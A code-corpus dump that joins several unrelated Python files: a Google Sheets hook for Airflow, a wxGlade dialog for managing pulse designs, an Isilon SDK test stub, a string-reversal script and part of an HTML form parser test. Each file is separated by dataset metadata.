        response = service.spreadsheets().values().get(  # pylint: disable=no-member
            spreadsheetId=self.spreadsheet_id,
            range=range_,
            majorDimension=major_dimension,
            valueRenderOption=value_render_option,
            dateTimeRenderOption=date_time_render_option
        ).execute(num_retries=self.num_retries)
        return response

    @CloudBaseHook.catch_http_exception
    def batch_get_values(
        self,
        ranges: List,
        major_dimension: str = 'DIMENSION_UNSPECIFIED',
        value_render_option: str = 'FORMATTED_VALUE',
        date_time_render_option: str = 'SERIAL_NUMBER'
    ) -> Dict:
        """
        Gets values from Google Sheet from a list of ranges
        https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets.values/batchGet

        :param ranges: The A1 notation of the values to retrieve.
        :type ranges: List
        :param major_dimension: Indicates which dimension an operation should apply to.
            DIMENSION_UNSPECIFIED, ROWS, or COLUMNS
        :type major_dimension: str
        :param value_render_option: Determines how values should be rendered in the output.
            FORMATTED_VALUE, UNFORMATTED_VALUE, or FORMULA
        :type value_render_option: str
        :param date_time_render_option: Determines how dates should be rendered in the output.
            SERIAL_NUMBER or FORMATTED_STRING
        :type date_time_render_option: str
        :return: Google Sheets API response.
        :rtype: Dict
        """
        service = self.get_conn()
        response = service.spreadsheets().values().batchGet(  # pylint: disable=no-member
            spreadsheetId=self.spreadsheet_id,
            ranges=ranges,
            majorDimension=major_dimension,
            valueRenderOption=value_render_option,
            dateTimeRenderOption=date_time_render_option
        ).execute(num_retries=self.num_retries)
        return response

    @CloudBaseHook.catch_http_exception
    def update_values(
        self,
        range_: str,
        values: List,
        major_dimension: str = 'ROWS',
        value_input_option: str = 'RAW',
        include_values_in_response: bool = False,
        value_render_option: str = 'FORMATTED_VALUE',
        date_time_render_option: str = 'SERIAL_NUMBER'
    ) -> Dict:
        """
        Updates values from Google Sheet from a single range
        https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets.values/update

        :param range_: The A1 notation of the values to retrieve.
        :type range_: str
        :param values: Data within a range of the spreadsheet.
        :type values: List
        :param major_dimension: Indicates which dimension an operation should apply to.
            DIMENSION_UNSPECIFIED, ROWS, or COLUMNS
        :type major_dimension: str
        :param value_input_option: Determines how input data should be interpreted.
            RAW or USER_ENTERED
        :type value_input_option: str
        :param include_values_in_response: Determines if the update response should
            include the values of the cells that were updated.
        :type include_values_in_response: bool
        :param value_render_option: Determines how values should be rendered in the output.
            FORMATTED_VALUE, UNFORMATTED_VALUE, or FORMULA
        :type value_render_option: str
        :param date_time_render_option: Determines how dates should be rendered in the output.
            SERIAL_NUMBER or FORMATTED_STRING
        :type date_time_render_option: str
        :return: Google Sheets API response.
        :rtype: Dict
        """
        service = self.get_conn()
        body = {
            "range": range_,
            "majorDimension": major_dimension,
            "values": values
        }
        response = service.spreadsheets().values().update(  # pylint: disable=no-member
            spreadsheetId=self.spreadsheet_id,
            range=range_,
            valueInputOption=value_input_option,
            includeValuesInResponse=include_values_in_response,
            responseValueRenderOption=value_render_option,
            responseDateTimeRenderOption=date_time_render_option,
            body=body
        ).execute(num_retries=self.num_retries)
        return response

    @CloudBaseHook.catch_http_exception
    def batch_update_values(
        self,
        ranges: List,
        values: List,
        major_dimension: str = 'ROWS',
        value_input_option: str = 'RAW',
        include_values_in_response: bool = False,
        value_render_option: str = 'FORMATTED_VALUE',
        date_time_render_option: str = 'SERIAL_NUMBER'
    ) -> Dict:
        """
        Updates values from Google Sheet for multiple ranges
        https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets.values/batchUpdate

        :param ranges: The A1 notation of the values to retrieve.
        :type ranges: List
        :param values: Data within a range of the spreadsheet.
        :type values: List
        :param major_dimension: Indicates which dimension an operation should apply to.
            DIMENSION_UNSPECIFIED, ROWS, or COLUMNS
        :type major_dimension: str
        :param value_input_option: Determines how input data should be interpreted.
            RAW or USER_ENTERED
        :type value_input_option: str
        :param include_values_in_response: Determines if the update response should
            include the values of the cells that were updated.
        :type include_values_in_response: bool
        :param value_render_option: Determines how values should be rendered in the output.
            FORMATTED_VALUE, UNFORMATTED_VALUE, or FORMULA
        :type value_render_option: str
        :param date_time_render_option: Determines how dates should be rendered in the output.
            SERIAL_NUMBER or FORMATTED_STRING
        :type date_time_render_option: str
        :return: Google Sheets API response.
        :rtype: Dict
        """
        if len(ranges) != len(values):
            # BUGFIX: the error message previously read
            # "'Ranges' and and 'Lists' ..." — doubled word, wrong parameter
            # name, and stray continuation-line whitespace inside the string.
            raise AirflowException(
                "'Ranges' and 'Values' must be of equal length. "
                "'Ranges' is of length: {} and 'Values' is of length: {}.".format(
                    len(ranges), len(values)))
        service = self.get_conn()
        # pair each range with its value matrix (idiom: comprehension instead
        # of a manual append loop; same resulting payload)
        data = [
            {
                "range": range_,
                "majorDimension": major_dimension,
                "values": values[idx]
            }
            for idx, range_ in enumerate(ranges)
        ]
        body = {
            "valueInputOption": value_input_option,
            "data": data,
            "includeValuesInResponse": include_values_in_response,
            "responseValueRenderOption": value_render_option,
            "responseDateTimeRenderOption": date_time_render_option
        }
        response = service.spreadsheets().values().batchUpdate(  # pylint: disable=no-member
            spreadsheetId=self.spreadsheet_id,
            body=body
        ).execute(num_retries=self.num_retries)
        return response

    @CloudBaseHook.catch_http_exception
    def append_values(
        self,
        range_: str,
        values: List,
        major_dimension: str = 'ROWS',
        value_input_option: str = 'RAW',
        insert_data_option: str = 'OVERWRITE',
        include_values_in_response: bool = False,
        value_render_option: str = 'FORMATTED_VALUE',
        date_time_render_option: str = 'SERIAL_NUMBER'
    ) -> Dict:
        """
        Append values from Google Sheet from a single range
        https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets.values/append

        :param range_: The A1 notation of the values to retrieve.
        :type range_: str
        :param values: Data within a range of the spreadsheet.
        :type values: List
        :param major_dimension: Indicates which dimension an operation should apply to.
            DIMENSION_UNSPECIFIED, ROWS, or COLUMNS
        :type major_dimension: str
        :param value_input_option: Determines how input data should be interpreted.
            RAW or USER_ENTERED
        :type value_input_option: str
        :param insert_data_option: Determines how existing data is changed when new data is input.
            OVERWRITE or INSERT_ROWS
        :type insert_data_option: str
        :param include_values_in_response: Determines if the update response should
            include the values of the cells that were updated.
        :type include_values_in_response: bool
        :param value_render_option: Determines how values should be rendered in the output.
            FORMATTED_VALUE, UNFORMATTED_VALUE, or FORMULA
        :type value_render_option: str
        :param date_time_render_option: Determines how dates should be rendered in the output.
            SERIAL_NUMBER or FORMATTED_STRING
        :type date_time_render_option: str
        :return: Google Sheets API response.
        :rtype: Dict
        """
        service = self.get_conn()
        body = {
            "range": range_,
            "majorDimension": major_dimension,
            "values": values
        }
        response = service.spreadsheets().values().append(  # pylint: disable=no-member
            spreadsheetId=self.spreadsheet_id,
            range=range_,
            valueInputOption=value_input_option,
            insertDataOption=insert_data_option,
            includeValuesInResponse=include_values_in_response,
            responseValueRenderOption=value_render_option,
            responseDateTimeRenderOption=date_time_render_option,
            body=body
        ).execute(num_retries=self.num_retries)
        return response

    @CloudBaseHook.catch_http_exception
    def clear(self, range_: str) -> Dict:
        """
        Clear values from Google Sheet from a single range
        https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets.values/clear

        :param range_: The A1 notation of the values to retrieve.
        :type range_: str
        :return: Google Sheets API response.
        :rtype: Dict
        """
        service = self.get_conn()
        response = service.spreadsheets().values().clear(  # pylint: disable=no-member
            spreadsheetId=self.spreadsheet_id,
            range=range_
        ).execute(num_retries=self.num_retries)
        return response

    @CloudBaseHook.catch_http_exception
    def batch_clear(self, ranges: List) -> Dict:
        """
        Clear values from Google Sheet from a list of ranges
        https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets.values/batchClear

        :param ranges: The A1 notation of the values to retrieve.
        :type ranges: List
        :return: Google Sheets API response.
        :rtype: Dict
        """
        service = self.get_conn()
        body = {
            "ranges": ranges
        }
        response = service.spreadsheets().values().batchClear(  # pylint: disable=no-member
            spreadsheetId=self.spreadsheet_id,
            body=body
        ).execute(num_retries=self.num_retries)
        return response
| 40.489189 | 103 | 0.660437 |
from typing import Any, Dict, List, Optional
from googleapiclient.discovery import build
from airflow.exceptions import AirflowException
from airflow.providers.google.cloud.hooks.base import CloudBaseHook
class GSheetsHook(CloudBaseHook):
    """Hook for the Google Sheets ``spreadsheets.values`` API, bound to a
    single ``spreadsheet_id``.  All request methods return the raw API
    response dict."""

    def __init__(
        self,
        spreadsheet_id: str,
        gcp_conn_id: str = 'google_cloud_default',
        api_version: str = 'v4',
        delegate_to: Optional[str] = None
    ) -> None:
        super().__init__(gcp_conn_id, delegate_to)
        self.spreadsheet_id = spreadsheet_id
        self.gcp_conn_id = gcp_conn_id
        self.api_version = api_version
        self.delegate_to = delegate_to
        # cached Sheets service client, built lazily in get_conn()
        self._conn = None

    def get_conn(self) -> Any:
        """Return (building and caching on first use) the Sheets service client."""
        if not self._conn:
            http_authorized = self._authorize()
            self._conn = build('sheets', self.api_version, http=http_authorized, cache_discovery=False)
        return self._conn

    @CloudBaseHook.catch_http_exception
    def get_values(
        self,
        range_: str,
        major_dimension: str = 'DIMENSION_UNSPECIFIED',
        value_render_option: str = 'FORMATTED_VALUE',
        date_time_render_option: str = 'SERIAL_NUMBER'
    ) -> Dict:
        """Read the values of a single A1 range (spreadsheets.values.get)."""
        service = self.get_conn()
        response = service.spreadsheets().values().get(
            spreadsheetId=self.spreadsheet_id,
            range=range_,
            majorDimension=major_dimension,
            valueRenderOption=value_render_option,
            dateTimeRenderOption=date_time_render_option
        ).execute(num_retries=self.num_retries)
        return response

    @CloudBaseHook.catch_http_exception
    def batch_get_values(
        self,
        ranges: List,
        major_dimension: str = 'DIMENSION_UNSPECIFIED',
        value_render_option: str = 'FORMATTED_VALUE',
        date_time_render_option: str = 'SERIAL_NUMBER'
    ) -> Dict:
        """Read the values of several A1 ranges (spreadsheets.values.batchGet)."""
        service = self.get_conn()
        response = service.spreadsheets().values().batchGet(
            spreadsheetId=self.spreadsheet_id,
            ranges=ranges,
            majorDimension=major_dimension,
            valueRenderOption=value_render_option,
            dateTimeRenderOption=date_time_render_option
        ).execute(num_retries=self.num_retries)
        return response

    @CloudBaseHook.catch_http_exception
    def update_values(
        self,
        range_: str,
        values: List,
        major_dimension: str = 'ROWS',
        value_input_option: str = 'RAW',
        include_values_in_response: bool = False,
        value_render_option: str = 'FORMATTED_VALUE',
        date_time_render_option: str = 'SERIAL_NUMBER'
    ) -> Dict:
        """Write ``values`` into a single A1 range (spreadsheets.values.update)."""
        service = self.get_conn()
        body = {
            "range": range_,
            "majorDimension": major_dimension,
            "values": values
        }
        response = service.spreadsheets().values().update(
            spreadsheetId=self.spreadsheet_id,
            range=range_,
            valueInputOption=value_input_option,
            includeValuesInResponse=include_values_in_response,
            responseValueRenderOption=value_render_option,
            responseDateTimeRenderOption=date_time_render_option,
            body=body
        ).execute(num_retries=self.num_retries)
        return response

    @CloudBaseHook.catch_http_exception
    def batch_update_values(
        self,
        ranges: List,
        values: List,
        major_dimension: str = 'ROWS',
        value_input_option: str = 'RAW',
        include_values_in_response: bool = False,
        value_render_option: str = 'FORMATTED_VALUE',
        date_time_render_option: str = 'SERIAL_NUMBER'
    ) -> Dict:
        """Write value matrices into several A1 ranges
        (spreadsheets.values.batchUpdate); ``ranges`` and ``values`` are
        paired by index and must have equal length."""
        if len(ranges) != len(values):
            # NOTE(review): message has a doubled "and" and says 'Lists'
            # where it means 'Values' — runtime string left untouched here.
            raise AirflowException(
                "'Ranges' and and 'Lists' must be of equal length. \n \
                'Ranges' is of length: {} and \n \
                'Values' is of length: {}.".format(str(len(ranges)), str(len(values))))
        service = self.get_conn()
        data = []
        for idx, range_ in enumerate(ranges):
            value_range = {
                "range": range_,
                "majorDimension": major_dimension,
                "values": values[idx]
            }
            data.append(value_range)
        body = {
            "valueInputOption": value_input_option,
            "data": data,
            "includeValuesInResponse": include_values_in_response,
            "responseValueRenderOption": value_render_option,
            "responseDateTimeRenderOption": date_time_render_option
        }
        response = service.spreadsheets().values().batchUpdate(
            spreadsheetId=self.spreadsheet_id,
            body=body
        ).execute(num_retries=self.num_retries)
        return response

    @CloudBaseHook.catch_http_exception
    def append_values(
        self,
        range_: str,
        values: List,
        major_dimension: str = 'ROWS',
        value_input_option: str = 'RAW',
        insert_data_option: str = 'OVERWRITE',
        include_values_in_response: bool = False,
        value_render_option: str = 'FORMATTED_VALUE',
        date_time_render_option: str = 'SERIAL_NUMBER'
    ) -> Dict:
        """Append ``values`` after a table located at ``range_``
        (spreadsheets.values.append)."""
        service = self.get_conn()
        body = {
            "range": range_,
            "majorDimension": major_dimension,
            "values": values
        }
        response = service.spreadsheets().values().append(
            spreadsheetId=self.spreadsheet_id,
            range=range_,
            valueInputOption=value_input_option,
            insertDataOption=insert_data_option,
            includeValuesInResponse=include_values_in_response,
            responseValueRenderOption=value_render_option,
            responseDateTimeRenderOption=date_time_render_option,
            body=body
        ).execute(num_retries=self.num_retries)
        return response

    @CloudBaseHook.catch_http_exception
    def clear(self, range_: str) -> Dict:
        """Clear the values of a single A1 range (spreadsheets.values.clear)."""
        service = self.get_conn()
        response = service.spreadsheets().values().clear(
            spreadsheetId=self.spreadsheet_id,
            range=range_
        ).execute(num_retries=self.num_retries)
        return response

    @CloudBaseHook.catch_http_exception
    def batch_clear(self, ranges: List) -> Dict:
        """Clear the values of several A1 ranges (spreadsheets.values.batchClear)."""
        service = self.get_conn()
        body = {
            "ranges": ranges
        }
        response = service.spreadsheets().values().batchClear(
            spreadsheetId=self.spreadsheet_id,
            body=body
        ).execute(num_retries=self.num_retries)
        return response
| true | true |
f73281be9ced4bbfcc2aa580105b37462d473a71 | 5,152 | py | Python | vespa/pulse/auto_gui/manage_pulse_designs.py | vespa-mrs/vespa | 6d3e84a206ec427ac1304e70c7fadf817432956b | [
"BSD-3-Clause"
] | null | null | null | vespa/pulse/auto_gui/manage_pulse_designs.py | vespa-mrs/vespa | 6d3e84a206ec427ac1304e70c7fadf817432956b | [
"BSD-3-Clause"
] | 4 | 2021-04-17T13:58:31.000Z | 2022-01-20T14:19:57.000Z | vespa/pulse/auto_gui/manage_pulse_designs.py | vespa-mrs/vespa | 6d3e84a206ec427ac1304e70c7fadf817432956b | [
"BSD-3-Clause"
] | 3 | 2021-06-05T16:34:57.000Z | 2022-01-19T16:13:22.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# generated by wxGlade 0.6.5 on Mon Jul 27 15:21:25 2015
import wx
# begin wxGlade: extracode
# end wxGlade
class MyDialog(wx.Dialog):
    """wxGlade-generated "Manage Pulse Designs" dialog.

    The sections between ``begin wxGlade``/``end wxGlade`` markers are
    regenerated by wxGlade — do not hand-edit them.  The ``on_*`` handlers
    are stubs intended to be overridden (or the events re-bound) by the
    application subclass.
    """

    def __init__(self, *args, **kwds):
        # begin wxGlade: MyDialog.__init__
        kwds["style"] = kwds.get("style", 0) | wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER
        wx.Dialog.__init__(self, *args, **kwds)
        self.label_2 = wx.StaticText(self, wx.ID_ANY, "")
        self.label_1 = wx.StaticText(self, wx.ID_ANY, "")
        self.ButtonView = wx.Button(self, wx.ID_ANY, "&View...")
        self.ButtonClone = wx.Button(self, wx.ID_ANY, "C&lone")
        self.ButtonDelete = wx.Button(self, wx.ID_DELETE, "")
        self.ListPulseDesigns = wx.ListCtrl(self, wx.ID_ANY, style=wx.BORDER_SUNKEN | wx.LC_REPORT)
        self.ButtonImport = wx.Button(self, wx.ID_ANY, "&Import...")
        self.ButtonExport = wx.Button(self, wx.ID_ANY, "E&xport...")
        self.ButtonClose = wx.Button(self, wx.ID_CLOSE, "")

        self.__set_properties()
        self.__do_layout()

        self.Bind(wx.EVT_BUTTON, self.on_view, self.ButtonView)
        self.Bind(wx.EVT_BUTTON, self.on_clone, self.ButtonClone)
        self.Bind(wx.EVT_BUTTON, self.on_delete, self.ButtonDelete)
        self.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.on_pulse_design_activated, self.ListPulseDesigns)
        self.Bind(wx.EVT_LIST_ITEM_DESELECTED, self.on_selection_changed, self.ListPulseDesigns)
        self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.on_selection_changed, self.ListPulseDesigns)
        self.Bind(wx.EVT_BUTTON, self.on_import, self.ButtonImport)
        self.Bind(wx.EVT_BUTTON, self.on_export, self.ButtonExport)
        self.Bind(wx.EVT_BUTTON, self.on_close, self.ButtonClose)
        # end wxGlade

    def __set_properties(self):
        # begin wxGlade: MyDialog.__set_properties
        self.SetTitle("Manage Pulse Designs")
        # end wxGlade

    def __do_layout(self):
        # begin wxGlade: MyDialog.__do_layout
        sizer_4 = wx.BoxSizer(wx.VERTICAL)
        grid_sizer_1 = wx.FlexGridSizer(3, 2, 10, 0)
        sizer_6 = wx.BoxSizer(wx.HORIZONTAL)
        sizer_5 = wx.BoxSizer(wx.VERTICAL)
        sizer_2 = wx.BoxSizer(wx.HORIZONTAL)
        sizer_1 = wx.BoxSizer(wx.HORIZONTAL)
        sizer_2_copy = wx.BoxSizer(wx.HORIZONTAL)
        grid_sizer_1.Add((20, 20), 0, 0, 0)
        sizer_2_copy.Add(self.label_2, 0, wx.ALIGN_CENTER_VERTICAL | wx.RIGHT, 5)
        sizer_2_copy.Add((20, 20), 0, 0, 0)
        sizer_2.Add(sizer_2_copy, 1, wx.EXPAND, 0)
        sizer_1.Add(self.label_1, 0, wx.ALIGN_CENTER_VERTICAL | wx.LEFT | wx.RIGHT, 5)
        sizer_1.Add((20, 20), 0, 0, 0)
        sizer_2.Add(sizer_1, 1, wx.EXPAND, 0)
        grid_sizer_1.Add(sizer_2, 1, wx.EXPAND, 0)
        sizer_5.Add(self.ButtonView, 0, wx.TOP, 5)
        sizer_5.Add(self.ButtonClone, 0, wx.TOP, 5)
        sizer_5.Add(self.ButtonDelete, 0, wx.TOP, 30)
        grid_sizer_1.Add(sizer_5, 0, wx.BOTTOM | wx.EXPAND | wx.LEFT | wx.RIGHT, 10)
        grid_sizer_1.Add(self.ListPulseDesigns, 1, wx.EXPAND, 0)
        grid_sizer_1.Add((20, 20), 0, 0, 0)
        sizer_6.Add(self.ButtonImport, 0, 0, 0)
        sizer_6.Add(self.ButtonExport, 0, wx.LEFT, 10)
        sizer_6.Add((20, 20), 1, wx.EXPAND, 0)
        sizer_6.Add(self.ButtonClose, 0, 0, 0)
        grid_sizer_1.Add(sizer_6, 0, wx.BOTTOM | wx.EXPAND, 10)
        grid_sizer_1.AddGrowableRow(1)
        grid_sizer_1.AddGrowableCol(1)
        sizer_4.Add(grid_sizer_1, 1, wx.ALL | wx.EXPAND, 10)
        self.SetSizer(sizer_4)
        sizer_4.Fit(self)
        self.Layout()
        # end wxGlade

    # --- event handler stubs generated by wxGlade; override in a subclass ---

    def on_view(self, event):  # wxGlade: MyDialog.<event_handler>
        print("Event handler `on_view' not implemented!")
        event.Skip()

    def on_clone(self, event):  # wxGlade: MyDialog.<event_handler>
        print("Event handler `on_clone' not implemented!")
        event.Skip()

    def on_delete(self, event):  # wxGlade: MyDialog.<event_handler>
        print("Event handler `on_delete' not implemented!")
        event.Skip()

    def on_selection_changed(self, event):  # wxGlade: MyDialog.<event_handler>
        print("Event handler `on_selection_changed' not implemented!")
        event.Skip()

    def on_pulse_design_activated(self, event):  # wxGlade: MyDialog.<event_handler>
        print("Event handler `on_pulse_design_activated' not implemented!")
        event.Skip()

    def on_import(self, event):  # wxGlade: MyDialog.<event_handler>
        print("Event handler `on_import' not implemented!")
        event.Skip()

    def on_export(self, event):  # wxGlade: MyDialog.<event_handler>
        print("Event handler `on_export' not implemented!")
        event.Skip()

    def on_close(self, event):  # wxGlade: MyDialog.<event_handler>
        print("Event handler `on_close' not implemented!")
        event.Skip()
# end of class MyDialog
if __name__ == "__main__":
    # NOTE(review): wx.PySimpleApp and wx.InitAllImageHandlers() are
    # deprecated and removed in wxPython 4 (Phoenix); replace with
    # wx.App(False) when upgrading — confirm the targeted wxPython version.
    app = wx.PySimpleApp(0)
    wx.InitAllImageHandlers()
    DialogManagePulseDesigns = MyDialog(None, -1, "")
    app.SetTopWindow(DialogManagePulseDesigns)
    DialogManagePulseDesigns.Show()
    app.MainLoop()
| 42.578512 | 100 | 0.65528 |
import wx
class MyDialog(wx.Dialog):
def __init__(self, *args, **kwds):
kwds["style"] = kwds.get("style", 0) | wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER
wx.Dialog.__init__(self, *args, **kwds)
self.label_2 = wx.StaticText(self, wx.ID_ANY, "")
self.label_1 = wx.StaticText(self, wx.ID_ANY, "")
self.ButtonView = wx.Button(self, wx.ID_ANY, "&View...")
self.ButtonClone = wx.Button(self, wx.ID_ANY, "C&lone")
self.ButtonDelete = wx.Button(self, wx.ID_DELETE, "")
self.ListPulseDesigns = wx.ListCtrl(self, wx.ID_ANY, style=wx.BORDER_SUNKEN | wx.LC_REPORT)
self.ButtonImport = wx.Button(self, wx.ID_ANY, "&Import...")
self.ButtonExport = wx.Button(self, wx.ID_ANY, "E&xport...")
self.ButtonClose = wx.Button(self, wx.ID_CLOSE, "")
self.__set_properties()
self.__do_layout()
self.Bind(wx.EVT_BUTTON, self.on_view, self.ButtonView)
self.Bind(wx.EVT_BUTTON, self.on_clone, self.ButtonClone)
self.Bind(wx.EVT_BUTTON, self.on_delete, self.ButtonDelete)
self.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.on_pulse_design_activated, self.ListPulseDesigns)
self.Bind(wx.EVT_LIST_ITEM_DESELECTED, self.on_selection_changed, self.ListPulseDesigns)
self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.on_selection_changed, self.ListPulseDesigns)
self.Bind(wx.EVT_BUTTON, self.on_import, self.ButtonImport)
self.Bind(wx.EVT_BUTTON, self.on_export, self.ButtonExport)
self.Bind(wx.EVT_BUTTON, self.on_close, self.ButtonClose)
def __set_properties(self):
self.SetTitle("Manage Pulse Designs")
def __do_layout(self):
sizer_4 = wx.BoxSizer(wx.VERTICAL)
grid_sizer_1 = wx.FlexGridSizer(3, 2, 10, 0)
sizer_6 = wx.BoxSizer(wx.HORIZONTAL)
sizer_5 = wx.BoxSizer(wx.VERTICAL)
sizer_2 = wx.BoxSizer(wx.HORIZONTAL)
sizer_1 = wx.BoxSizer(wx.HORIZONTAL)
sizer_2_copy = wx.BoxSizer(wx.HORIZONTAL)
grid_sizer_1.Add((20, 20), 0, 0, 0)
sizer_2_copy.Add(self.label_2, 0, wx.ALIGN_CENTER_VERTICAL | wx.RIGHT, 5)
sizer_2_copy.Add((20, 20), 0, 0, 0)
sizer_2.Add(sizer_2_copy, 1, wx.EXPAND, 0)
sizer_1.Add(self.label_1, 0, wx.ALIGN_CENTER_VERTICAL | wx.LEFT | wx.RIGHT, 5)
sizer_1.Add((20, 20), 0, 0, 0)
sizer_2.Add(sizer_1, 1, wx.EXPAND, 0)
grid_sizer_1.Add(sizer_2, 1, wx.EXPAND, 0)
sizer_5.Add(self.ButtonView, 0, wx.TOP, 5)
sizer_5.Add(self.ButtonClone, 0, wx.TOP, 5)
sizer_5.Add(self.ButtonDelete, 0, wx.TOP, 30)
grid_sizer_1.Add(sizer_5, 0, wx.BOTTOM | wx.EXPAND | wx.LEFT | wx.RIGHT, 10)
grid_sizer_1.Add(self.ListPulseDesigns, 1, wx.EXPAND, 0)
grid_sizer_1.Add((20, 20), 0, 0, 0)
sizer_6.Add(self.ButtonImport, 0, 0, 0)
sizer_6.Add(self.ButtonExport, 0, wx.LEFT, 10)
sizer_6.Add((20, 20), 1, wx.EXPAND, 0)
sizer_6.Add(self.ButtonClose, 0, 0, 0)
grid_sizer_1.Add(sizer_6, 0, wx.BOTTOM | wx.EXPAND, 10)
grid_sizer_1.AddGrowableRow(1)
grid_sizer_1.AddGrowableCol(1)
sizer_4.Add(grid_sizer_1, 1, wx.ALL | wx.EXPAND, 10)
self.SetSizer(sizer_4)
sizer_4.Fit(self)
self.Layout()
def on_view(self, event):
print("Event handler `on_view' not implemented!")
event.Skip()
def on_clone(self, event): # wxGlade: MyDialog.<event_handler>
print("Event handler `on_clone' not implemented!")
event.Skip()
def on_delete(self, event):
print("Event handler `on_delete' not implemented!")
event.Skip()
def on_selection_changed(self, event): # wxGlade: MyDialog.<event_handler>
print("Event handler `on_selection_changed' not implemented!")
event.Skip()
def on_pulse_design_activated(self, event):
print("Event handler `on_pulse_design_activated' not implemented!")
event.Skip()
def on_import(self, event): # wxGlade: MyDialog.<event_handler>
print("Event handler `on_import' not implemented!")
event.Skip()
def on_export(self, event):
print("Event handler `on_export' not implemented!")
event.Skip()
def on_close(self, event): # wxGlade: MyDialog.<event_handler>
print("Event handler `on_close' not implemented!")
event.Skip()
if __name__ == "__main__":
app = wx.PySimpleApp(0)
wx.InitAllImageHandlers()
DialogManagePulseDesigns = MyDialog(None, -1, "")
app.SetTopWindow(DialogManagePulseDesigns)
DialogManagePulseDesigns.Show()
app.MainLoop()
| true | true |
f73281d82427249aef51b7db781136ffb89a9860 | 1,042 | py | Python | isi_sdk_8_1_1/test/test_providers_summary_provider_instance.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 24 | 2018-06-22T14:13:23.000Z | 2022-03-23T01:21:26.000Z | isi_sdk_8_1_1/test/test_providers_summary_provider_instance.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 46 | 2018-04-30T13:28:22.000Z | 2022-03-21T21:11:07.000Z | isi_sdk_8_1_1/test/test_providers_summary_provider_instance.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 29 | 2018-06-19T00:14:04.000Z | 2022-02-08T17:51:19.000Z | # coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 6
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import isi_sdk_8_1_1
from isi_sdk_8_1_1.models.providers_summary_provider_instance import ProvidersSummaryProviderInstance # noqa: E501
from isi_sdk_8_1_1.rest import ApiException
class TestProvidersSummaryProviderInstance(unittest.TestCase):
"""ProvidersSummaryProviderInstance unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testProvidersSummaryProviderInstance(self):
"""Test ProvidersSummaryProviderInstance"""
# FIXME: construct object with mandatory attributes with example values
# model = isi_sdk_8_1_1.models.providers_summary_provider_instance.ProvidersSummaryProviderInstance() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 25.414634 | 123 | 0.744722 |
from __future__ import absolute_import
import unittest
import isi_sdk_8_1_1
from isi_sdk_8_1_1.models.providers_summary_provider_instance import ProvidersSummaryProviderInstance
from isi_sdk_8_1_1.rest import ApiException
class TestProvidersSummaryProviderInstance(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def testProvidersSummaryProviderInstance(self):
s
if __name__ == '__main__':
unittest.main()
| true | true |
f732826458cc6b350d8bd7d018b41884c4e3e17e | 50 | py | Python | ineuron/Python_Assignment_2/reverse.py | niraj-kale/ineuron | f1ee3df4e666b0579a6aaec409c0557650c338da | [
"MIT"
] | null | null | null | ineuron/Python_Assignment_2/reverse.py | niraj-kale/ineuron | f1ee3df4e666b0579a6aaec409c0557650c338da | [
"MIT"
] | null | null | null | ineuron/Python_Assignment_2/reverse.py | niraj-kale/ineuron | f1ee3df4e666b0579a6aaec409c0557650c338da | [
"MIT"
] | null | null | null | word = input("Input a word : ")
print(word[::-1]) | 16.666667 | 31 | 0.58 | word = input("Input a word : ")
print(word[::-1]) | true | true |
f73283321fed4349be2b954e61d0cbe802264e78 | 3,075 | py | Python | cellpack/mgl_tools/mglutil/web/Tests/test_htmlparser.py | mesoscope/cellpack | ec6b736fc706c1fae16392befa814b5337a3a692 | [
"MIT"
] | null | null | null | cellpack/mgl_tools/mglutil/web/Tests/test_htmlparser.py | mesoscope/cellpack | ec6b736fc706c1fae16392befa814b5337a3a692 | [
"MIT"
] | 21 | 2021-10-02T00:07:05.000Z | 2022-03-30T00:02:10.000Z | cellpack/mgl_tools/mglutil/web/Tests/test_htmlparser.py | mesoscope/cellpack | ec6b736fc706c1fae16392befa814b5337a3a692 | [
"MIT"
] | null | null | null | #########################################################################
#
# Date: Nov. 2002 Author: Daniel Stoffler
#
# Copyright: Daniel Stoffler and TSRI
#
#########################################################################
import sys
from mglutil.regression import testplus
from mglutil.web import HTMLParser
from time import sleep
def pause(sleepTime=0.4):
ed.master.update()
sleep(sleepTime)
def test_ParseCGIForms():
f = open("Data/testfile.html", "r")
txt = f.readlines()
P = HTMLParser.ParseHTML(mode="forms")
forms = P.parse(txt)
f.close()
# we have 4 forms in this testfile (INPUT)
assert len(forms) == 4
# FORM 0:
# form 0 has a text entry and a sumbit button (INPUT)
assert len(list(forms[0].input.keys())) == 2
# form 0 has no name, the parser should set the name to 'form_0'
assert forms[0].name == "form_0"
# the method of form 0 is 'post'
assert forms[0].method == "post"
# the action of form 0 is http://hoohoo.ncsa.uiuc.edu/cgi-bin/post-query
assert forms[0].action == "http://hoohoo.ncsa.uiuc.edu/cgi-bin/post-query"
# testing the inputs:
assert forms[0].input["input_0"]["type"] == "submit"
assert forms[0].input["input_0"]["value"] == "Submit Query"
##########################################################################
# FORM 1
# form[1] has 2 text entry, 3 checkbuttons, 7 radiobuttons, 1 submit button
assert len(list(forms[1].input.keys())) == 3 # 2 text entries, 1 submit button
assert len(list(forms[1].radiobutton.items())) == 2 # 2 categories
assert len(forms[1].radiobutton["paymethod"]) == 5
assert len(forms[1].radiobutton["callfirst"]) == 2 # 5 + 2 = 7
assert len(list(forms[1].checkbutton.items())) == 1 # 1 category
